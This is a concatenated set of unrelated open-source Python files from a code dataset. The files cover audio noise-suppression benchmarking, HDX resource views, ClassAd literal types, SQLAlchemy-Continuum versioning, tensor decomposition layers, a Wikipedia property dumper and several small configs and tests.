cleanFile = resultPrefix + 'cleanAudios/clean_' + audioFile + str(30 * multiplier) + '.wav'
audio.saveAs(testAudio, sampleRate, cleanFile)
cle = plt.figure(1)
dx = cle.add_subplot(111)
cleanSpectrum, cleanFreqs, cleanLine = dx.magnitude_spectrum(testAudio, Fs=sampleRate)
cle.savefig(resultPrefix + 'cleanSpectra/spectra' + str(30 * multiplier) + '.png')
dx.clear()
for noiseFile in noiseFiles:
noise, sampleRate = audio.getData(audioPrefix + noiseFile + '.wav')
noise = [row[0] for row in noise[:sampleRate * 5]]
testNoise = np.tile(noise, multiplier * 6)
testNoise = testNoise * 4
noiseTransf = np.fft.fft(testNoise)
audioTransf = np.fft.fft(testAudio)
noisy = np.fft.ifft(noiseTransf + audioTransf).real
noisyFile = resultPrefix + 'noisyAudios/noisy' + noiseFile + str(30 * multiplier) + '.wav'
audio.saveAs(noisy, sampleRate, noisyFile)
testNoiseFile = resultPrefix + 'noiseAudios/test' + noiseFile + str(30 * multiplier) + '.wav'
audio.saveAs(testNoise, sampleRate, testNoiseFile)
mix = plt.figure(2)
sep = plt.figure(3)
nos = plt.figure(4)
ax = mix.add_subplot(111)
bx = sep.add_subplot(111)
cx = nos.add_subplot(111)
noisySpectrum, noisyFreqs, noisyLine = cx.magnitude_spectrum(noisy, Fs=sampleRate)
noisyCleanDiff = np.sum(noisySpectrum - cleanSpectrum)
noisyCleanRate = noisyCleanDiff / (np.sum(cleanSpectrum) + np.sum(noisySpectrum))
print("Noisy/Clean rate: {}".format(noisyCleanRate))
nos.savefig(resultPrefix + 'noisySpectra/spectra' + noiseFile + str(30 * multiplier) + '.png')
cx.clear()
for method in methods:
print('Running for {} on noise {} with length {}'.format(method, noiseFile, 30 * multiplier))
headers.append('{}_{}_{}'.format(method, noiseFile, 30 * multiplier))
times = np.zeros(repetitions)
for turn in range(repetitions):
if method == 'spectralSubtraction':
suppressedAudio, sampleRate, elapsed = spectralSubtraction.spectral(noisyFile, testNoiseFile, useEstimate=False, splitRate=4)
elif method == 'flms':
suppressedAudio, sampleRate, elapsed = fastLMS.fastlms(noisyFile, cleanFile)
else:
blks = int((multiplier * 30) / 60) + 1
suppressedAudio, sampleRate, elapsed = plcaWavelet.plca(noisyFile, testNoiseFile, 10)
current += 1
currentPerc = round((100.0 * current) / testsAmount, 3)
now = time.time() - start
remain = round((100.0 - currentPerc) * (now / currentPerc), 2)
print('********** {}% completo, {} segundos restantes **********'.format(currentPerc, remain))
times[turn] = elapsed
content.append(round(np.mean(times), 6))
content.append(round(np.std(times), 6))
content.append(round(np.var(times), 6))
content.append(round(((suppressedAudio - testAudio) ** 2).mean(), 6))
suppressedSpectrum, suppressedFreqs, suppressedLine = bx.magnitude_spectrum(suppressedAudio, Fs=sampleRate)
ax.magnitude_spectrum(suppressedAudio, Fs=sampleRate)
suppressedCleanDiff = np.sum(suppressedSpectrum - cleanSpectrum)
suppressedCleanRate = (1.0 * suppressedCleanDiff) / (np.sum(cleanSpectrum) + np.sum(suppressedSpectrum))
print("Suppressed/Clean rate: {}".format(suppressedCleanRate))
sep.savefig(resultPrefix + 'suppressedSpectra/suppressed' + method + noiseFile + str(30 * multiplier) + '.png')
bx.clear()
suppressedFile = resultPrefix + 'suppressedAudios/suppressed' + method + noiseFile + str(30 * multiplier) + '.wav'
audio.saveAs(suppressedAudio, sampleRate, suppressedFile)
mix.savefig(resultPrefix + 'suppressedSpectra/suppressed' + noiseFile + str(30 * multiplier) + '.png')
with open('{}results_{}.csv'.format(resultPrefix, 6 * 30), 'w') as csvfile:
fileWritter = csv.writer(csvfile, delimiter=',')
fileWritter.writerow(headers)
mean = []
std = []
var = []
error = []
for i in range(0, len(content), 4):
mean.append(content[i])
std.append(content[i+1])
var.append(content[i+2])
error.append(content[i+3])
fileWritter.writerow(['Mean time'] + mean)
fileWritter.writerow(['Time stdDev'] + std)
fileWritter.writerow(['Time var'] + var)
fileWritter.writerow(['Squared Error'] + error)
runTests()
|
StarcoderdataPython
|
41722
|
class BaseServerException(Exception):
def __init__(self, detail, status_code, message):
super().__init__(message)
self.detail = detail
self.status_code = status_code
class SearchFieldRequiered(BaseServerException):
def __init__(self):
super().__init__(detail='entity', status_code=404, message='Search field required')
|
StarcoderdataPython
|
3379749
|
"""Resource view class containing all logic for creating, checking, and updating resource views."""
import logging
from os.path import join
from typing import Any, Dict, List, Optional, Union
from hdx.utilities.uuid import is_valid_uuid
from hdx.api.configuration import Configuration
from hdx.data.hdxobject import HDXError, HDXObject
logger = logging.getLogger(__name__)
class ResourceView(HDXObject):
"""ResourceView class containing all logic for creating, checking, and updating resource views.
Args:
initial_data (Optional[Dict]): Initial resource view metadata dictionary. Defaults to None.
configuration (Optional[Configuration]): HDX configuration. Defaults to global configuration.
"""
def __init__(
self,
initial_data: Optional[Dict] = None,
configuration: Optional[Configuration] = None,
) -> None:
if not initial_data:
initial_data = dict()
super().__init__(initial_data, configuration=configuration)
@staticmethod
def actions() -> Dict[str, str]:
"""Dictionary of actions that can be performed on object
Returns:
Dict[str, str]: Dictionary of actions that can be performed on object
"""
return {
"show": "resource_view_show",
"update": "resource_view_update",
"create": "resource_view_create",
"delete": "resource_view_delete",
"list": "resource_view_list",
"reorder": "resource_view_reorder",
}
def update_from_yaml(
self, path: str = join("config", "hdx_resource_view_static.yml")
) -> None:
"""Update resource view metadata with static metadata from YAML file
Args:
path (Optional[str]): Path to YAML resource view metadata. Defaults to config/hdx_resource_view_static.yml.
Returns:
None
"""
super().update_from_yaml(path)
def update_from_json(
self, path: str = join("config", "hdx_resource_view_static.json")
) -> None:
"""Update resource view metadata with static metadata from JSON file
Args:
path (Optional[str]): Path to JSON dataset metadata. Defaults to config/hdx_resource_view_static.json.
Returns:
None
"""
super().update_from_json(path)
@classmethod
def read_from_hdx(
cls, identifier: str, configuration: Optional[Configuration] = None
) -> Optional["ResourceView"]:
"""Reads the resource view given by identifier from HDX and returns ResourceView object
Args:
identifier (str): Identifier of resource view
configuration (Optional[Configuration]): HDX configuration. Defaults to global configuration.
Returns:
Optional[ResourceView]: ResourceView object if successful read, None if not
"""
return cls._read_from_hdx_class(
"resource view", identifier, configuration
)
@staticmethod
def get_all_for_resource(
identifier: str, configuration: Optional[Configuration] = None
) -> List["ResourceView"]:
"""Read all resource views for a resource given by identifier from HDX and returns list of ResourceView objects
Args:
identifier (str): Identifier of resource
configuration (Optional[Configuration]): HDX configuration. Defaults to global configuration.
Returns:
List[ResourceView]: List of ResourceView objects
"""
resourceview = ResourceView(configuration=configuration)
success, result = resourceview._read_from_hdx(
"resource view", identifier, "id", ResourceView.actions()["list"]
)
resourceviews = list()
if success:
for resourceviewdict in result:
resourceview = ResourceView(
resourceviewdict, configuration=configuration
)
resourceviews.append(resourceview)
return resourceviews
def check_required_fields(self, ignore_fields: List[str] = list()) -> None:
"""Check that metadata for resource view is complete. The parameter ignore_fields should
be set if required to any fields that should be ignored for the particular operation.
Args:
ignore_fields (List[str]): Fields to ignore. Default is [].
Returns:
None
"""
self._check_required_fields("resource view", ignore_fields)
def _update_resource_view(self, log: bool = False, **kwargs: Any) -> bool:
"""Check if resource view exists in HDX and if so, update resource view
Returns:
bool: True if updated and False if not
"""
update = False
if "id" in self.data and self._load_from_hdx(
"resource view", self.data["id"]
):
update = True
else:
if "resource_id" in self.data:
resource_views = self.get_all_for_resource(
self.data["resource_id"]
)
for resource_view in resource_views:
if self.data["title"] == resource_view["title"]:
self.old_data = self.data
self.data = resource_view.data
update = True
break
if update:
if log:
logger.warning(
f"resource view exists. Updating {self.data['id']}"
)
self._merge_hdx_update("resource view", "id", **kwargs)
return update
def update_in_hdx(self, **kwargs: Any) -> None:
"""Check if resource view exists in HDX and if so, update resource view
Returns:
None
"""
if not self._update_resource_view(**kwargs):
raise HDXError("No existing resource view to update!")
def create_in_hdx(self, **kwargs: Any) -> None:
"""Check if resource view exists in HDX and if so, update it, otherwise create resource view
Returns:
None
"""
if "ignore_check" not in kwargs: # allow ignoring of field checks
self.check_required_fields()
if not self._update_resource_view(log=True, **kwargs):
self._save_to_hdx("create", "title")
def delete_from_hdx(self) -> None:
"""Deletes a resource view from HDX.
Returns:
None
"""
self._delete_from_hdx("resource view", "id")
def copy(self, resource_view: Union["ResourceView", Dict, str]) -> None:
"""Copies all fields except id, resource_id and package_id from another resource view.
Args:
resource_view (Union[ResourceView,Dict,str]): Either a resource view id or resource view metadata either from a ResourceView object or a dictionary
Returns:
None
"""
if isinstance(resource_view, str):
if is_valid_uuid(resource_view) is False:
raise HDXError(
f"{resource_view} is not a valid resource view id!"
)
resource_view = ResourceView.read_from_hdx(resource_view)
if not isinstance(resource_view, dict) and not isinstance(
resource_view, ResourceView
):
raise HDXError(f"{resource_view} is not a valid resource view!")
for key in resource_view:
if key not in ("id", "resource_id", "package_id"):
self.data[key] = resource_view[key]
|
StarcoderdataPython
|
3363525
|
<reponame>98llm/tir-script-samples
#//-------------------------------------------------------------------
#/*/{Protheus.doc} MATA037
#
#@author carlos.capeli
#@since 13/11/2019
#@version P12
#/*/
#//-------------------------------------------------------------------
from tir import Webapp
import unittest
import time
class MATA037(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup('SIGAEST','13/11/2019','T1','D MG 01')
inst.oHelper.Program('MATA037')
def test_MAT037_001(self):
self.oHelper.SearchBrowse("D MG 01 EST023")
self.oHelper.SetButton("Carregar")
self.oHelper.SetValue("Cliente","EST006", grid=True, grid_number=2)
self.oHelper.SetValue("Loja","01", grid=True, grid_number=2)
self.oHelper.SetValue("Quantidade","80,00", grid=True, grid_number=2)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Confirmar")
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
72877
|
<reponame>vo0doO/pydj-persweb<filename>authentication/socialaccount/providers/foursquare/urls.py
from authentication.socialaccount.providers.oauth2.urls import default_urlpatterns
from .provider import FoursquareProvider
urlpatterns = default_urlpatterns(FoursquareProvider)
|
StarcoderdataPython
|
3316792
|
import settings
import handlers.base_handler
import csv
class CartogramHandler(handlers.base_handler.BaseCartogramHandler):
def get_name(self):
return "Myanmar"
def get_gen_file(self):
return "{}/mmr_processedmap.json".format(settings.CARTOGRAM_DATA_DIR)
def validate_values(self, values):
if len(values) != 15:
return False
for v in values:
if type(v) != float:
return False
return True
def gen_area_data(self, values):
return """1 {} Ayeyarwady
2 {} Bago
3 {} Chin
4 {} Kachin
5 {} Kayah
6 {} Kayin
7 {} Magway
8 {} Mandalay
9 {} Mon
10 {} Naypyitaw
11 {} Rakhine
12 {} Sagaing
13 {} Shan
14 {} Tanintharyi
15 {} Yangon""".format(*values)
def expect_geojson_output(self):
return True
def csv_to_area_string_and_colors(self, csvfile):
return self.order_by_example(csv.reader(csvfile), "State/Region", 0, 1, 2, 3, ["Ayeyarwady","Bago","Chin","Kachin","Kayah","Kayin","Magway","Mandalay","Mon","Naypyitaw","Rakhine","Sagaing","Shan","Tanintharyi","Yangon"], [0.0 for i in range(0,15)], {"Ayeyarwady":"1","Bago":"2","Chin":"3","Kachin":"4","Kayah":"5","Kayin":"6","Magway":"7","Mandalay":"8","Mon":"9","Naypyitaw":"10","Rakhine":"11","Sagaing":"12","Shan":"13","Tanintharyi":"14","Yangon":"15"})
|
StarcoderdataPython
|
33031
|
<filename>tests/test_primary_beams.py<gh_stars>1-10
"""Unit tests for testing support
"""
import logging
import os
import unittest
import numpy
from astropy import units as u
from astropy.coordinates import SkyCoord
from arl.data.polarisation import PolarisationFrame
from arl.image.operations import export_image_to_fits
from arl.imaging.base import create_image_from_visibility
from arl.util.primary_beams import create_pb_vla
from arl.util.testing_support import create_named_configuration
from arl.visibility.base import create_visibility
log = logging.getLogger(__name__)
class TestPrimaryBeams(unittest.TestCase):
def setUp(self):
self.dir = './test_results'
os.makedirs(self.dir, exist_ok=True)
self.frequency = numpy.linspace(1e8, 1.5e8, 3)
self.channel_bandwidth = numpy.array([2.5e7, 2.5e7, 2.5e7])
self.flux = numpy.array([[100.0], [100.0], [100.0]])
self.phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')
self.config = create_named_configuration('LOWBD2-CORE')
self.times = numpy.linspace(-300.0, 300.0, 3) * numpy.pi / 43200.0
nants = self.config.xyz.shape[0]
assert nants > 1
assert len(self.config.names) == nants
assert len(self.config.mount) == nants
def createVis(self, config, dec=-35.0, rmax=None):
self.config = create_named_configuration(config, rmax=rmax)
self.phasecentre = SkyCoord(ra=+15 * u.deg, dec=dec * u.deg, frame='icrs', equinox='J2000')
self.vis = create_visibility(self.config, self.times, self.frequency,
channel_bandwidth=self.channel_bandwidth,
phasecentre=self.phasecentre, weight=1.0,
polarisation_frame=PolarisationFrame('stokesI'))
def test_create_primary_beams_vla(self):
self.createVis(config='LOWBD2', rmax=1000.0)
model = create_image_from_visibility(self.vis, cellsize=0.00001, override_cellsize=True)
beam=create_pb_vla(model)
assert numpy.max(beam.data) > 0.0
export_image_to_fits(beam, "%s/primary_beam_vla.fits" % self.dir)
|
StarcoderdataPython
|
3360833
|
<reponame>MaineKuehn/classad
"""
Literal constants: integer, float, string, boolean, error, or undefined
"""
from typing import Union
from classad._base_expression import PrimitiveExpression
class Undefined(PrimitiveExpression):
"""
The keyword ``UNDEFINED`` (case insensitive) represents the ``UNDEFINED`` value.
"""
__slots__ = ()
def __bool__(self):
raise TypeError
def __htc_eq__(
self, other: PrimitiveExpression
) -> "Union[PrimitiveExpression, Undefined, Error]":
if isinstance(other, Error):
return NotImplemented
return Undefined()
def __and__(self, other):
if isinstance(other, HTCBool) and not other:
return HTCBool(False)
return self.__htc_eq__(other)
def __or__(self, other):
if isinstance(other, HTCBool) and other:
return HTCBool(True)
return self.__htc_eq__(other)
__add__ = (
__radd__
) = (
__sub__
) = (
__rsub__
) = (
__mul__
) = (
__rmul__
) = (
__truediv__
) = (
__rtruediv__
) = __lt__ = __le__ = __ge__ = __gt__ = __rand__ = __ror__ = __htc_ne__ = __htc_eq__
def __eq__(self, other: PrimitiveExpression) -> "HTCBool":
if type(self) == type(other):
return HTCBool(True)
return HTCBool(False)
def __ne__(self, other: PrimitiveExpression) -> "HTCBool":
return HTCBool(not self.__eq__(other))
def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
return Undefined()
def __repr__(self):
return f"<{self.__class__.__name__}>"
def __hash__(self):
return hash("undefined")
class Error(PrimitiveExpression):
"""
The keyword ``ERROR`` (case insensitive) represents the ``ERROR`` value.
"""
__slots__ = ()
def __bool__(self):
raise TypeError
def __htc_eq__(
self, other: PrimitiveExpression
) -> "Union[PrimitiveExpression, Undefined, Error]":
return Error()
__add__ = (
__radd__
) = (
__sub__
) = (
__rsub__
) = (
__mul__
) = (
__rmul__
) = (
__truediv__
) = (
__rtruediv__
) = (
__lt__
) = (
__le__
) = (
__ge__
) = __gt__ = __and__ = __rand__ = __or__ = __ror__ = __htc_ne__ = __htc_eq__
def __eq__(self, other: PrimitiveExpression) -> "HTCBool":
if type(self) == type(other):
return HTCBool(True)
return HTCBool(False)
def __ne__(self, other: PrimitiveExpression) -> "HTCBool":
return HTCBool(not self.__eq__(other))
def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
return Error()
def __repr__(self):
return f"<{self.__class__.__name__}>"
def __hash__(self):
return hash("error")
class HTCInt(int, PrimitiveExpression):
__slots__ = ()
def __add__(self, other):
if isinstance(other, int):
return HTCInt(super().__add__(other))
elif isinstance(other, (float, Undefined, Error)):
return NotImplemented
return Error()
__radd__ = __add__
def __sub__(self, other):
if isinstance(other, int):
return HTCInt(super().__sub__(other))
elif isinstance(other, (float, Undefined, Error)):
return NotImplemented
return Error()
def __mul__(self, other):
if isinstance(other, int):
return HTCInt(super().__mul__(other))
elif isinstance(other, (float, Undefined, Error)):
return NotImplemented
return Error()
def __truediv__(self, other):
try:
if isinstance(other, int):
return HTCFloat(super().__truediv__(other))
elif isinstance(other, (float, Undefined, Error)):
return NotImplemented
return Error()
except ZeroDivisionError:
return Error()
def __lt__(self, other):
try:
result = super().__lt__(other)
except TypeError:
return Error()
else:
return result if result is NotImplemented else HTCBool(result)
def __ge__(self, other):
try:
result = super().__ge__(other)
except TypeError:
return Error()
else:
return result if result is NotImplemented else HTCBool(result)
def __gt__(self, other):
try:
result = super().__gt__(other)
except TypeError:
return Error()
else:
return result if result is NotImplemented else HTCBool(result)
def __le__(self, other):
try:
result = super().__le__(other)
except TypeError:
return Error()
else:
return result if result is NotImplemented else HTCBool(result)
def __htc_eq__(
self, other: PrimitiveExpression
) -> Union[PrimitiveExpression, Undefined, Error]:
if isinstance(other, int):
return HTCBool(super().__eq__(other))
elif isinstance(other, (Undefined, Error, HTCFloat)):
return NotImplemented
elif isinstance(other, float):
return HTCBool(self == other)
return Error()
def __htc_ne__(
self, other: PrimitiveExpression
) -> Union[PrimitiveExpression, Undefined, Error]:
result = self.__htc_eq__(other)
if isinstance(result, HTCBool):
return HTCBool(not result)
return result
def __eq__(self, other: PrimitiveExpression) -> "HTCBool":
if isinstance(other, int):
return HTCBool(super().__eq__(other))
elif isinstance(other, float):
return NotImplemented
return HTCBool(False)
def __ne__(self, other: PrimitiveExpression) -> "HTCBool":
if isinstance(other, int):
return HTCBool(super().__ne__(other))
elif isinstance(other, float):
return NotImplemented
return HTCBool(True)
def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
return Error()
def __repr__(self):
return f"<{self.__class__.__name__}>: {self}"
def __hash__(self):
return super().__hash__()
class HTCList(tuple, PrimitiveExpression):
__slots__ = ()
def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
return Error()
def __repr__(self):
return f"<{self.__class__.__name__}>: {[element for element in self]}"
class HTCStr(str, PrimitiveExpression):
__slots__ = ()
def __htc_eq__(
self, other: PrimitiveExpression
) -> Union[PrimitiveExpression, Undefined, Error]:
if isinstance(other, str):
return HTCBool(self.lower() == other.lower())
return NotImplemented
def __htc_ne__(
self, other: PrimitiveExpression
) -> Union[PrimitiveExpression, Undefined, Error]:
result = self.__htc_eq__(other)
if isinstance(result, HTCBool):
return HTCBool(not result)
return result
def __eq__(self, other: PrimitiveExpression) -> "HTCBool":
if type(self) == type(other) and super().__eq__(other):
return HTCBool(True)
return HTCBool(False)
def __ne__(self, other: PrimitiveExpression) -> "HTCBool":
if type(self) != type(other) or super().__ne__(other):
return HTCBool(True)
return HTCBool(False)
def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
return Error()
def __repr__(self):
return f"<{self.__class__.__name__}>: {self}"
def __hash__(self):
return super().__hash__()
class HTCFloat(float, PrimitiveExpression):
__slots__ = ()
def __mul__(self, other):
if isinstance(other, (int, float)):
return HTCFloat(super().__mul__(other))
elif isinstance(other, (Undefined, Error)):
return NotImplemented
return Error()
__rmul__ = __mul__
def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
return Error()
def __htc_eq__(
self, other: PrimitiveExpression
) -> Union[PrimitiveExpression, Undefined, Error]:
if isinstance(other, (int, float)):
return HTCBool(super().__eq__(other))
elif isinstance(other, (Undefined, Error)):
return NotImplemented
return Error()
def __htc_ne__(
self, other: PrimitiveExpression
) -> Union[PrimitiveExpression, Undefined, Error]:
result = self.__htc_eq__(other)
if isinstance(result, HTCBool):
return HTCBool(not result)
return result
def __eq__(self, other: PrimitiveExpression) -> "HTCBool":
if isinstance(other, (int, float)):
return HTCBool(super().__eq__(other))
return HTCBool(False)
def __ne__(self, other: PrimitiveExpression) -> "HTCBool":
if isinstance(other, (int, float)):
return HTCBool(super().__ne__(other))
return HTCBool(False)
def __repr__(self):
return f"<{self.__class__.__name__}>: {self}"
def __hash__(self):
return super().__hash__()
class HTCBool(PrimitiveExpression):
__slots__ = ("_value",)
def __init__(self, x):
super().__init__()
self._value = True if x != 0 else False
def __add__(self, other):
return Error()
__sub__ = __mul__ = __truediv__ = __gt__ = __ge__ = __le__ = __lt__ = __add__
def __eq__(self, other):
return (
type(self) == type(other) and self._value == other._value
) or other is self._value
def __ne__(self, other):
return (
type(self) == type(other) and self._value != other._value
) or other is not self._value
def __bool__(self):
return self._value
def __or__(self, other):
if not self._value:
if isinstance(other, (HTCBool, Undefined)):
return other
elif self._value:
return HTCBool(True)
return Error()
def __and__(self, other):
if not self._value:
return HTCBool(False)
elif self._value:
if isinstance(other, (HTCBool, Undefined)):
return other
return Error()
def __htc_eq__(
self, other: PrimitiveExpression
) -> Union[PrimitiveExpression, Undefined, Error]:
if isinstance(other, HTCBool):
return HTCBool(self._value is other._value)
elif isinstance(other, (Undefined, Error)):
return NotImplemented
elif isinstance(other, bool):
return HTCBool(self._value is other)
return Error()
def __htc_ne__(
self, other: "PrimitiveExpression"
) -> "Union[HTCBool, Undefined, Error]":
return self.__htc_not__().__htc_eq__(other)
def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
return HTCBool(not self._value)
def __repr__(self):
return f"<{self.__class__.__name__}>: {self._value}"
def __hash__(self):
return hash(self._value)
|
StarcoderdataPython
|
136383
|
import sqlalchemy as sa
from .exc import ClassNotVersioned, ImproperlyConfigured
from .manager import VersioningManager
from .operation import Operation
from .transaction import TransactionFactory
from .unit_of_work import UnitOfWork
from .utils import (
changeset,
count_versions,
get_versioning_manager,
is_modified,
is_session_modified,
parent_class,
transaction_class,
tx_column_name,
vacuum,
version_class,
)
__version__ = '1.3.9+geru.1'
versioning_manager = VersioningManager()
def make_versioned(
mapper=sa.orm.mapper,
session=sa.orm.session.Session,
manager=versioning_manager,
plugins=None,
options=None,
user_cls='User'
):
"""
This is the public API function of SQLAlchemy-Continuum for making certain
mappers and sessions versioned. By default this applies to all mappers and
all sessions.
:param mapper:
SQLAlchemy mapper to apply the versioning to.
:param session:
SQLAlchemy session to apply the versioning to. By default this is
sa.orm.session.Session meaning it applies to all Session subclasses.
:param manager:
SQLAlchemy-Continuum versioning manager.
:param plugins:
Plugins to pass for versioning manager.
:param options:
A dictionary of VersioningManager options.
:param user_cls:
User class which the Transaction class should have relationship to.
This can either be a class or string name of a class for lazy
evaluation.
"""
if plugins is not None:
manager.plugins = plugins
if options is not None:
manager.options.update(options)
manager.user_cls = user_cls
manager.apply_class_configuration_listeners(mapper)
manager.track_operations(mapper)
manager.track_session(session)
sa.event.listen(
sa.engine.Engine,
'before_cursor_execute',
manager.track_association_operations
)
sa.event.listen(
sa.engine.Engine,
'rollback',
manager.clear_connection
)
sa.event.listen(
sa.engine.Engine,
'set_connection_execution_options',
manager.track_cloned_connections
)
def remove_versioning(
mapper=sa.orm.mapper,
session=sa.orm.session.Session,
manager=versioning_manager
):
"""
Remove the versioning from given mapper / session and manager.
:param mapper:
SQLAlchemy mapper to remove the versioning from.
:param session:
SQLAlchemy session to remove the versioning from. By default this is
sa.orm.session.Session meaning it applies to all sessions.
:param manager:
SQLAlchemy-Continuum versioning manager.
"""
manager.reset()
manager.remove_class_configuration_listeners(mapper)
manager.remove_operations_tracking(mapper)
manager.remove_session_tracking(session)
sa.event.remove(
sa.engine.Engine,
'before_cursor_execute',
manager.track_association_operations
)
sa.event.remove(
sa.engine.Engine,
'rollback',
manager.clear_connection
)
sa.event.remove(
sa.engine.Engine,
'set_connection_execution_options',
manager.track_cloned_connections
)
|
StarcoderdataPython
|
1776294
|
import mailpile.app
import mailpile.commands
import mailpile.ui
# Load the standard plugins
from mailpile.plugins import *
__all__ = ['Mailpile',
"app", "commands", "plugins", "mailutils", "search", "ui", "util"]
class Mailpile(object):
"""This object provides a simple Python API to Mailpile."""
def __init__(self, ui=mailpile.ui.UserInteraction):
self._config = mailpile.app.ConfigManager()
self._session = mailpile.ui.Session(self._config)
self._session.config.load(self._session)
self._session.main = True
self._ui = self._session.ui = ui()
for (cmd, cls) in mailpile.commands.COMMANDS.values():
cmd, fnc = self._mk_action(cmd)
if cls.SYNOPSIS:
fnc.__doc__ = '%s(%s) # %s' % (cmd, cls.SYNOPSIS, cls.__doc__)
else:
fnc.__doc__ = '%s() # %s' % (cmd, cls.__doc__)
setattr(self, cmd, fnc)
def _mk_action(self, cmd):
if cmd.endswith('='):
cmd = cmd[:-1]
def fnc(*args):
return mailpile.commands.Action(self._session, cmd, args)
return cmd, fnc
else:
def fnc():
return mailpile.commands.Action(self._session, cmd, '')
return cmd, fnc
|
StarcoderdataPython
|
1791513
|
<filename>redap/specs/group/one.py
# -*- coding: utf-8 -*-
from . import get_group_spec, def_group, param_path
response_def = {
'definition': def_group,
'response': {
"description": "Single group",
"schema": {
"$ref": "#/definitions/Group"
}
}
}
data = get_group_spec(
summary='Get single group',
params=[param_path],
responses=[(200, response_def)]
)
|
StarcoderdataPython
|
1765961
|
# Copyright (c) 2015-2019 by the parties listed in the AUTHORS file.
# All rights reserved. Use of this source code is governed by
# a BSD-style license that can be found in the LICENSE file.
# import functions into our public API
from .tod import TOD, TODCache
from .interval import Interval, OpFlagGaps
from .tod_math import (
calibrate,
sim_noise_timestream,
OpCacheCopy,
OpCacheClear,
flagged_running_average,
OpCacheInit,
OpFlagsApply,
)
from .sim_noise import AnalyticNoise
from .sim_interval import regular_intervals
from .sim_det_noise import OpSimNoise
from .sim_focalplane import (
hex_layout,
rhombus_layout,
hex_pol_angles_qu,
hex_pol_angles_radial,
rhomb_pol_angles_qu,
plot_focalplane,
)
from .noise import Noise
from .polyfilter import OpPolyFilter
from .gainscrambler import OpGainScrambler
from .applygain import OpApplyGain, write_calibration_file
from .memorycounter import OpMemoryCounter
from .tidas import available as tidas_available
from .spt3g_utils import available as spt3g_available
|
StarcoderdataPython
|
3379047
|
<gh_stars>1-10
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
from torch.optim.lr_scheduler import StepLR
import torchvision
import torchvision.transforms as transforms
from torchvision import models
import tensorly as tl
import tensorly
from itertools import chain
from tensorly.decomposition import parafac, tucker, matrix_product_state
import os
import matplotlib.pyplot as plt
import numpy as np
import time
def decomposition_fc_layer(layer, rank):
l, r = matrix_product_state(layer.weight.data, rank=rank)
l, r = l.squeeze(), r.squeeze()
right_layer = torch.nn.Linear(r.shape[1], r.shape[0])
left_layer = torch.nn.Linear(l.shape[1], l.shape[0])
left_layer.bias.data = layer.bias.data
left_layer.weight.data = l
right_layer.weight.data = r
new_layers = [right_layer, left_layer]
return nn.Sequential(*new_layers)
def tucker_decomposition_fc_layer(layer, rank):
core, [l, r] = tucker(layer.weight.data, rank=rank)
right_layer = torch.nn.Linear(r.shape[0], r.shape[1])
core_layer = torch.nn.Linear(core.shape[1], core.shape[0])
left_layer = torch.nn.Linear(l.shape[1], l.shape[0])
left_layer.bias.data = layer.bias.data
left_layer.weight.data = l
right_layer.weight.data = r.T
new_layers = [right_layer, core_layer, left_layer]
return nn.Sequential(*new_layers)
|
StarcoderdataPython
|
4837407
|
import argparse
import requests
import json
import logging
queries = {}
def load_queries():
global queries
with open("queries.json", 'r') as f:
queries = json.load(f)
def dump_all():
for lang in queries.keys():
dump(lang)
def dump(lang):
""" dumps """
logging.info("Saving properties for language '{}'".format(lang))
S = requests.Session()
dump_id = queries[lang]["json"]
URL = "https://quarry.wmflabs.org/run/{}/output/0/json".format(dump_id)
R = S.get(url=URL)
S.close()
data = R.json()
results = {}
for row in data["rows"]:
property_id = row[0]
property_label = row[1]
results[property_id] = property_label
save_results(results, lang)
def save_results(results, lang):
with open("properties/{}.json".format(lang), 'w') as f:
json.dump(results, f, indent=2)
if __name__ == "__main__":
load_queries()
parser = argparse.ArgumentParser(description='Dumps wikipedia properties')
available_languages = ", ".join(["ALL"] + list(queries.keys()))
parser.add_argument('LANG', metavar='LANG', type=str,
help='available languages: {}'.format(available_languages))
args = parser.parse_args()
lang = args.LANG
if lang == "ALL":
dump_all()
else:
dump(lang)
|
StarcoderdataPython
|
3311504
|
# _*_ coding: utf-8 _*_
"""
Created by Alimazing on 2018/4/2.
"""
import os
__author__ = 'Alimazing'
is_dev_mode = os.path.exists('app/config/dev.py') # 'development' & 'product' (开发环境 or 生产环境)
TOKEN_EXPIRATION = 30 * 24 * 3600
EXTERNAL_URL = 'api.ivinetrue.com' # 外部(远程)地址
INTERNAL_URL = '0.0.0.0:8080' # 内部(本地)地址
SERVER_URL = INTERNAL_URL if is_dev_mode else EXTERNAL_URL
IMG_PREFIX = SERVER_URL + '/static/images'
UPLOAD_FOLDER = 'app/static/uploads'
SWAGGER = {
"swagger_version": "2.0",
"info": {
"title": "微信小程序商城: API",
"version": "0.3.0",
"description": "简要描述一下这个api文档的功能",
"contact": {
"responsibleOrganization": "Shema(聆听)",
"responsibleDeveloper": "Allen7D",
"email": "<EMAIL>",
"url": "http://ivinetrue.com"
},
"termsOfService": "http://ivinetrue.com"
},
"host": SERVER_URL, #"api.ivinetrue.com",
"basePath": "/", # base bash for blueprint registration
"tags": [],
"schemes": [
"http",
"https"
],
"operationId": "getmyData",
"securityDefinitions": {
'basicAuth': {
'type': 'basic'
}
}
}
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.